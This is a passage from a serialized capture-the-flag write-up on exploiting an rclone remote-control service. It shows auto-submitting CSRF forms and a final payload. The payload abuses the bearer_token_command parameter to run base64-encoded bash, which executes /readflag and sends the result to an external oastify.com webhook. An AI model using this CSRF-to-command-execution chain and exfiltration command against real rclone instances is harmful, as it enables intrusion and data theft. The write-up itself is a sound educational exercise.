CSRF",{"type":32,"tag":66,"props":2327,"children":2328},{"lang":1880},[2329],{"type":32,"tag":71,"props":2330,"children":2332},{"code":2331,"language":1880,"meta":7,"className":1885,"style":7},"\u003C!-- 2.html -->\n\u003Cform method=\"POST\" action='http://rclone:5572/operations/list?fs=test_csrf:&remote='>\n  \u003Cinput type=\"submit\" value=\"CSRF\" />\n  \u003Cscript>\n    document.forms[0].submit();\n  \u003C/script>\n\u003C/form>\n",[2333],{"type":32,"tag":77,"props":2334,"children":2335},{"__ignoreMap":7},[2336,2344,2400,2455,2470,2505,2520],{"type":32,"tag":81,"props":2337,"children":2338},{"class":83,"line":84},[2339],{"type":32,"tag":81,"props":2340,"children":2341},{"style":179},[2342],{"type":37,"value":2343},"\u003C!-- 2.html 
-->\n",{"type":32,"tag":81,"props":2345,"children":2346},{"class":83,"line":100},[2347,2351,2355,2359,2363,2367,2371,2375,2379,2383,2387,2392,2396],{"type":32,"tag":81,"props":2348,"children":2349},{"style":94},[2350],{"type":37,"value":1905},{"type":32,"tag":81,"props":2352,"children":2353},{"style":503},[2354],{"type":37,"value":2114},{"type":32,"tag":81,"props":2356,"children":2357},{"style":860},[2358],{"type":37,"value":2119},{"type":32,"tag":81,"props":2360,"children":2361},{"style":94},[2362],{"type":37,"value":2124},{"type":32,"tag":81,"props":2364,"children":2365},{"style":206},[2366],{"type":37,"value":1941},{"type":32,"tag":81,"props":2368,"children":2369},{"style":127},[2370],{"type":37,"value":2133},{"type":32,"tag":81,"props":2372,"children":2373},{"style":206},[2374],{"type":37,"value":1941},{"type":32,"tag":81,"props":2376,"children":2377},{"style":860},[2378],{"type":37,"value":2142},{"type":32,"tag":81,"props":2380,"children":2381},{"style":94},[2382],{"type":37,"value":2124},{"type":32,"tag":81,"props":2384,"children":2385},{"style":206},[2386],{"type":37,"value":884},{"type":32,"tag":81,"props":2388,"children":2389},{"style":127},[2390],{"type":37,"value":2391},"http://rclone:5572/operations/list?fs=test_csrf:&remote=",{"type":32,"tag":81,"props":2393,"children":2394},{"style":206},[2395],{"type":37,"value":884},{"type":32,"tag":81,"props":2397,"children":2398},{"style":94},[2399],{"type":37,"value":1915},{"type":32,"tag":81,"props":2401,"children":2402},{"class":83,"line":113},[2403,2407,2411,2415,2419,2423,2427,2431,2435,2439,2443,2447,2451],{"type":32,"tag":81,"props":2404,"children":2405},{"style":94},[2406],{"type":37,"value":2171},{"type":32,"tag":81,"props":2408,"children":2409},{"style":503},[2410],{"type":37,"value":2176},{"type":32,"tag":81,"props":2412,"children":2413},{"style":860},[2414],{"type":37,"value":2181},{"type":32,"tag":81,"props":2416,"children":2417},{"style":94},[2418],{"type":37,"value":2124},{"type":32,"tag":81,"props":
2420,"children":2421},{"style":206},[2422],{"type":37,"value":1941},{"type":32,"tag":81,"props":2424,"children":2425},{"style":127},[2426],{"type":37,"value":2194},{"type":32,"tag":81,"props":2428,"children":2429},{"style":206},[2430],{"type":37,"value":1941},{"type":32,"tag":81,"props":2432,"children":2433},{"style":860},[2434],{"type":37,"value":2203},{"type":32,"tag":81,"props":2436,"children":2437},{"style":94},[2438],{"type":37,"value":2124},{"type":32,"tag":81,"props":2440,"children":2441},{"style":206},[2442],{"type":37,"value":1941},{"type":32,"tag":81,"props":2444,"children":2445},{"style":127},[2446],{"type":37,"value":2216},{"type":32,"tag":81,"props":2448,"children":2449},{"style":206},[2450],{"type":37,"value":1941},{"type":32,"tag":81,"props":2452,"children":2453},{"style":94},[2454],{"type":37,"value":2225},{"type":32,"tag":81,"props":2456,"children":2457},{"class":83,"line":133},[2458,2462,2466],{"type":32,"tag":81,"props":2459,"children":2460},{"style":94},[2461],{"type":37,"value":2171},{"type":32,"tag":81,"props":2463,"children":2464},{"style":503},[2465],{"type":37,"value":1910},{"type":32,"tag":81,"props":2467,"children":2468},{"style":94},[2469],{"type":37,"value":1915},{"type":32,"tag":81,"props":2471,"children":2472},{"class":83,"line":152},[2473,2477,2481,2485,2489,2493,2497,2501],{"type":32,"tag":81,"props":2474,"children":2475},{"style":860},[2476],{"type":37,"value":2248},{"type":32,"tag":81,"props":2478,"children":2479},{"style":94},[2480],{"type":37,"value":868},{"type":32,"tag":81,"props":2482,"children":2483},{"style":860},[2484],{"type":37,"value":2257},{"type":32,"tag":81,"props":2486,"children":2487},{"style":94},[2488],{"type":37,"value":2262},{"type":32,"tag":81,"props":2490,"children":2491},{"style":146},[2492],{"type":37,"value":2267},{"type":32,"tag":81,"props":2494,"children":2495},{"style":94},[2496],{"type":37,"value":2272},{"type":32,"tag":81,"props":2498,"children":2499},{"style":871},[2500],{"type":37,"value":2194},{"typ
e":32,"tag":81,"props":2502,"children":2503},{"style":94},[2504],{"type":37,"value":2281},{"type":32,"tag":81,"props":2506,"children":2507},{"class":83,"line":165},[2508,2512,2516],{"type":32,"tag":81,"props":2509,"children":2510},{"style":94},[2511],{"type":37,"value":2289},{"type":32,"tag":81,"props":2513,"children":2514},{"style":503},[2515],{"type":37,"value":1910},{"type":32,"tag":81,"props":2517,"children":2518},{"style":94},[2519],{"type":37,"value":1915},{"type":32,"tag":81,"props":2521,"children":2522},{"class":83,"line":185},[2523,2527,2531],{"type":32,"tag":81,"props":2524,"children":2525},{"style":94},[2526],{"type":37,"value":2070},{"type":32,"tag":81,"props":2528,"children":2529},{"style":503},[2530],{"type":37,"value":2114},{"type":32,"tag":81,"props":2532,"children":2533},{"style":94},[2534],{"type":37,"value":1915},{"type":32,"tag":46,"props":2536,"children":2537},{},[2538],{"type":37,"value":2539},"If we go to the dashboard, we can see that a new remote named \"CSRF\" has been created.",{"type":32,"tag":56,"props":2541,"children":2543},{"imgSrc":2542},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1721252881/writeups/rclone_dashboard.webp",[],{"type":32,"tag":46,"props":2545,"children":2546},{},[2547],{"type":37,"value":2548},"We can also see that a file named lolipop_from_bot has indeed been created in the /tmp folder.",{"type":32,"tag":56,"props":2550,"children":2552},{"imgSrc":2551},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1721252881/writeups/ls_tmp_from_bot.webp",[],{"type":32,"tag":46,"props":2554,"children":2555},{},[2556],{"type":37,"value":2557},"Now that we have a PoC of the RCE via the bot, another problem arises: we cannot retrieve the flag directly from the rclone container because it has no internet access. However, the rclone service is on the same network as the bot. 
To do this, we will need to go through the bot that will forward the information to us.",{"type":32,"tag":39,"props":2559,"children":2561},{"id":2560},"final-payload",[2562],{"type":37,"value":2563},"Final payload",{"type":32,"tag":46,"props":2565,"children":2566},{},[2567],{"type":37,"value":2568},"As previously mentioned, our final bash payload will look like this:\nIt makes a request to the bot that passes a webhook URL in the body, and the flag is passed in the webhook URL.",{"type":32,"tag":66,"props":2570,"children":2571},{"lang":1611},[2572],{"type":32,"tag":71,"props":2573,"children":2575},{"code":2574,"language":1611,"meta":7,"className":1616,"style":7},"curl -H \"Content-type: application/x-www-form-urlencoded\" -d \"url=https://r7z7f6ul1nguh27mf65wveqeu500osch.oastify.com/?flag=$(/readflag | base64)\" http://bot:8000/submit\n",[2576],{"type":32,"tag":77,"props":2577,"children":2578},{"__ignoreMap":7},[2579],{"type":32,"tag":81,"props":2580,"children":2581},{"class":83,"line":84},[2582,2587,2592,2596,2601,2605,2610,2614,2619,2624,2629,2634,2639,2643,2647],{"type":32,"tag":81,"props":2583,"children":2584},{"style":871},[2585],{"type":37,"value":2586},"curl",{"type":32,"tag":81,"props":2588,"children":2589},{"style":1630},[2590],{"type":37,"value":2591}," -H",{"type":32,"tag":81,"props":2593,"children":2594},{"style":206},[2595],{"type":37,"value":209},{"type":32,"tag":81,"props":2597,"children":2598},{"style":127},[2599],{"type":37,"value":2600},"Content-type: application/x-www-form-urlencoded",{"type":32,"tag":81,"props":2602,"children":2603},{"style":206},[2604],{"type":37,"value":1941},{"type":32,"tag":81,"props":2606,"children":2607},{"style":1630},[2608],{"type":37,"value":2609}," 
-d",{"type":32,"tag":81,"props":2611,"children":2612},{"style":206},[2613],{"type":37,"value":209},{"type":32,"tag":81,"props":2615,"children":2616},{"style":127},[2617],{"type":37,"value":2618},"url=https://r7z7f6ul1nguh27mf65wveqeu500osch.oastify.com/?flag=",{"type":32,"tag":81,"props":2620,"children":2621},{"style":94},[2622],{"type":37,"value":2623},"$(",{"type":32,"tag":81,"props":2625,"children":2626},{"style":871},[2627],{"type":37,"value":2628},"/readflag",{"type":32,"tag":81,"props":2630,"children":2631},{"style":901},[2632],{"type":37,"value":2633}," |",{"type":32,"tag":81,"props":2635,"children":2636},{"style":871},[2637],{"type":37,"value":2638}," base64",{"type":32,"tag":81,"props":2640,"children":2641},{"style":94},[2642],{"type":37,"value":928},{"type":32,"tag":81,"props":2644,"children":2645},{"style":206},[2646],{"type":37,"value":1941},{"type":32,"tag":81,"props":2648,"children":2649},{"style":127},[2650],{"type":37,"value":2651}," http://bot:8000/submit\n",{"type":32,"tag":46,"props":2653,"children":2654},{},[2655],{"type":37,"value":2656},"For more flexibility, we will encode our payload in base64 and pass it in bash command like this:",{"type":32,"tag":66,"props":2658,"children":2659},{"lang":1611},[2660],{"type":32,"tag":71,"props":2661,"children":2663},{"code":2662,"language":1611,"meta":7,"className":1616,"style":7},"bash -c \"echo Y3VybCAtSCAiQ29udGVudC10eXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiIC1kICJ1cmw9aHR0cHM6Ly9yN3o3ZjZ1bDFuZ3VoMjdtZjY1d3ZlcWV1NTAwb3NjaC5vYXN0aWZ5LmNvbS8/ZmxhZz0kKC9yZWFkZmxhZyB8IGJhc2U2NCkiIGh0dHA6Ly9ib3Q6ODAwMC9zdWJtaXQ%3d | base64 -d 
|bash\"\n",[2664],{"type":32,"tag":77,"props":2665,"children":2666},{"__ignoreMap":7},[2667],{"type":32,"tag":81,"props":2668,"children":2669},{"class":83,"line":84},[2670,2674,2678,2682,2687],{"type":32,"tag":81,"props":2671,"children":2672},{"style":871},[2673],{"type":37,"value":1611},{"type":32,"tag":81,"props":2675,"children":2676},{"style":1630},[2677],{"type":37,"value":1633},{"type":32,"tag":81,"props":2679,"children":2680},{"style":206},[2681],{"type":37,"value":209},{"type":32,"tag":81,"props":2683,"children":2684},{"style":127},[2685],{"type":37,"value":2686},"echo Y3VybCAtSCAiQ29udGVudC10eXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiIC1kICJ1cmw9aHR0cHM6Ly9yN3o3ZjZ1bDFuZ3VoMjdtZjY1d3ZlcWV1NTAwb3NjaC5vYXN0aWZ5LmNvbS8/ZmxhZz0kKC9yZWFkZmxhZyB8IGJhc2U2NCkiIGh0dHA6Ly9ib3Q6ODAwMC9zdWJtaXQ%3d | base64 -d |bash",{"type":32,"tag":81,"props":2688,"children":2689},{"style":206},[2690],{"type":37,"value":219},{"type":32,"tag":46,"props":2692,"children":2693},{},[2694],{"type":37,"value":2695},"Our final payload, fully encoded and embedded in our CSRF form, will look like this:",{"type":32,"tag":66,"props":2697,"children":2698},{"lang":1880},[2699],{"type":32,"tag":71,"props":2700,"children":2702},{"code":2701,"language":1880,"meta":7,"className":1885,"style":7},"\u003Cform method=\"POST\" action='http://rclone:5572/config/create?parameters={\"url\"%3a\"http%3a//not_exist.localhost:9999\",\"bearer_token_command\"%3a\"bash+-c+echo${IFS}Y3VybCAtSCAiQ29udGVudC10eXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiIC1kICJ1cmw9aHR0cHM6Ly9yN3o3ZjZ1bDFuZ3VoMjdtZjY1d3ZlcWV1NTAwb3NjaC5vYXN0aWZ5LmNvbS8/ZmxhZz0kKC9yZWFkZmxhZyB8IGJhc2U2NCkiIGh0dHA6Ly9ib3Q6ODAwMC9zdWJtaXQ%3d|${IFS}base64${IFS}-d|${IFS}bash\"}&name=csrf&type=webdav'>\n  \u003Cinput type=\"submit\" value=\"CSRF\" />\n  \u003Cscript>\n    document.forms[0].submit();\n  
\u003C/script>\n\u003C/form>\n",[2703],{"type":32,"tag":77,"props":2704,"children":2705},{"__ignoreMap":7},[2706,2762,2817,2832,2867,2882],{"type":32,"tag":81,"props":2707,"children":2708},{"class":83,"line":84},[2709,2713,2717,2721,2725,2729,2733,2737,2741,2745,2749,2754,2758],{"type":32,"tag":81,"props":2710,"children":2711},{"style":94},[2712],{"type":37,"value":1905},{"type":32,"tag":81,"props":2714,"children":2715},{"style":503},[2716],{"type":37,"value":2114},{"type":32,"tag":81,"props":2718,"children":2719},{"style":860},[2720],{"type":37,"value":2119},{"type":32,"tag":81,"props":2722,"children":2723},{"style":94},[2724],{"type":37,"value":2124},{"type":32,"tag":81,"props":2726,"children":2727},{"style":206},[2728],{"type":37,"value":1941},{"type":32,"tag":81,"props":2730,"children":2731},{"style":127},[2732],{"type":37,"value":2133},{"type":32,"tag":81,"props":2734,"children":2735},{"style":206},[2736],{"type":37,"value":1941},{"type":32,"tag":81,"props":2738,"children":2739},{"style":860},[2740],{"type":37,"value":2142},{"type":32,"tag":81,"props":2742,"children":2743},{"style":94},[2744],{"type":37,"value":2124},{"type":32,"tag":81,"props":2746,"children":2747},{"style":206},[2748],{"type":37,"value":884},{"type":32,"tag":81,"props":2750,"children":2751},{"style":127},[2752],{"type":37,"value":2753},"http://rclone:5572/config/create?parameters={\"url\"%3a\"http%3a//not_exist.localhost:9999\",\"bearer_token_command\"%3a\"bash+-c+echo${IFS}Y3VybCAtSCAiQ29udGVudC10eXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiIC1kICJ1cmw9aHR0cHM6Ly9yN3o3ZjZ1bDFuZ3VoMjdtZjY1d3ZlcWV1NTAwb3NjaC5vYXN0aWZ5LmNvbS8/ZmxhZz0kKC9yZWFkZmxhZyB8IGJhc2U2NCkiIGh0dHA6Ly9ib3Q6ODAwMC9zdWJtaXQ%3d|${IFS}base64${IFS}-d|${IFS}bash\"}&name=csrf&type=webdav",{"type":32,"tag":81,"props":2755,"children":2756},{"style":206},[2757],{"type":37,"value":884},{"type":32,"tag":81,"props":2759,"children":2760},{"style":94},[2761],{"type":37,"value":1915},{"type":32,"tag":81,"props":2763,"children":2764}
,{"class":83,"line":100},[2765,2769,2773,2777,2781,2785,2789,2793,2797,2801,2805,2809,2813],{"type":32,"tag":81,"props":2766,"children":2767},{"style":94},[2768],{"type":37,"value":2171},{"type":32,"tag":81,"props":2770,"children":2771},{"style":503},[2772],{"type":37,"value":2176},{"type":32,"tag":81,"props":2774,"children":2775},{"style":860},[2776],{"type":37,"value":2181},{"type":32,"tag":81,"props":2778,"children":2779},{"style":94},[2780],{"type":37,"value":2124},{"type":32,"tag":81,"props":2782,"children":2783},{"style":206},[2784],{"type":37,"value":1941},{"type":32,"tag":81,"props":2786,"children":2787},{"style":127},[2788],{"type":37,"value":2194},{"type":32,"tag":81,"props":2790,"children":2791},{"style":206},[2792],{"type":37,"value":1941},{"type":32,"tag":81,"props":2794,"children":2795},{"style":860},[2796],{"type":37,"value":2203},{"type":32,"tag":81,"props":2798,"children":2799},{"style":94},[2800],{"type":37,"value":2124},{"type":32,"tag":81,"props":2802,"children":2803},{"style":206},[2804],{"type":37,"value":1941},{"type":32,"tag":81,"props":2806,"children":2807},{"style":127},[2808],{"type":37,"value":2216},{"type":32,"tag":81,"props":2810,"children":2811},{"style":206},[2812],{"type":37,"value":1941},{"type":32,"tag":81,"props":2814,"children":2815},{"style":94},[2816],{"type":37,"value":2225},{"type":32,"tag":81,"props":2818,"children":2819},{"class":83,"line":113},[2820,2824,2828],{"type":32,"tag":81,"props":2821,"children":2822},{"style":94},[2823],{"type":37,"value":2171},{"type":32,"tag":81,"props":2825,"children":2826},{"style":503},[2827],{"type":37,"value":1910},{"type":32,"tag":81,"props":2829,"children":2830},{"style":94},[2831],{"type":37,"value":1915},{"type":32,"tag":81,"props":2833,"children":2834},{"class":83,"line":133},[2835,2839,2843,2847,2851,2855,2859,2863],{"type":32,"tag":81,"props":2836,"children":2837},{"style":860},[2838],{"type":37,"value":2248},{"type":32,"tag":81,"props":2840,"children":2841},{"style":94},[2842],{"typ
e":37,"value":868},{"type":32,"tag":81,"props":2844,"children":2845},{"style":860},[2846],{"type":37,"value":2257},{"type":32,"tag":81,"props":2848,"children":2849},{"style":94},[2850],{"type":37,"value":2262},{"type":32,"tag":81,"props":2852,"children":2853},{"style":146},[2854],{"type":37,"value":2267},{"type":32,"tag":81,"props":2856,"children":2857},{"style":94},[2858],{"type":37,"value":2272},{"type":32,"tag":81,"props":2860,"children":2861},{"style":871},[2862],{"type":37,"value":2194},{"type":32,"tag":81,"props":2864,"children":2865},{"style":94},[2866],{"type":37,"value":2281},{"type":32,"tag":81,"props":2868,"children":2869},{"class":83,"line":152},[2870,2874,2878],{"type":32,"tag":81,"props":2871,"children":2872},{"style":94},[2873],{"type":37,"value":2289},{"type":32,"tag":81,"props":2875,"children":2876},{"style":503},[2877],{"type":37,"value":1910},{"type":32,"tag":81,"props":2879,"children":2880},{"style":94},[2881],{"type":37,"value":1915},{"type":32,"tag":81,"props":2883,"children":2884},{"class":83,"line":165},[2885,2889,2893],{"type":32,"tag":81,"props":2886,"children":2887},{"style":94},[2888],{"type":37,"value":2070},{"type":32,"tag":81,"props":2890,"children":2891},{"style":503},[2892],{"type":37,"value":2114},{"type":32,"tag":81,"props":2894,"children":2895},{"style":94},[2896],{"type":37,"value":1915},{"type":32,"tag":46,"props":2898,"children":2899},{},[2900],{"type":37,"value":2901},"Same as before, we need to create another CSRF to trigger the command.",{"type":32,"tag":46,"props":2903,"children":2904},{},[2905],{"type":37,"value":2906},"We now just need to host these files on a site that the bot can access and submit the URL to the bot.",{"type":32,"tag":46,"props":2908,"children":2909},{},[2910],{"type":37,"value":2911},"And our webhook will receive the 
flag:",{"type":32,"tag":56,"props":2913,"children":2915},{"imgSrc":2914},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1721248952/writeups/rclone/flag_webhook.webp",[],{"type":32,"tag":2917,"props":2918,"children":2919},"style",{},[2920],{"type":37,"value":2921},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}",{"title":7,"searchDepth":100,"depth":84,"links":2923},[2924,2925,2926,2927,2928],{"id":41,"depth":100,"text":44},{"id":509,"depth":100,"text":512},{"id":1564,"depth":100,"text":1567},{"id":1754,"depth":100,"text":1757},{"id":2560,"depth":100,"text":2563},"markdown","content:writeups:rclone.md","content","writeups/rclone.md","writeups/rclone","md",1749027224521]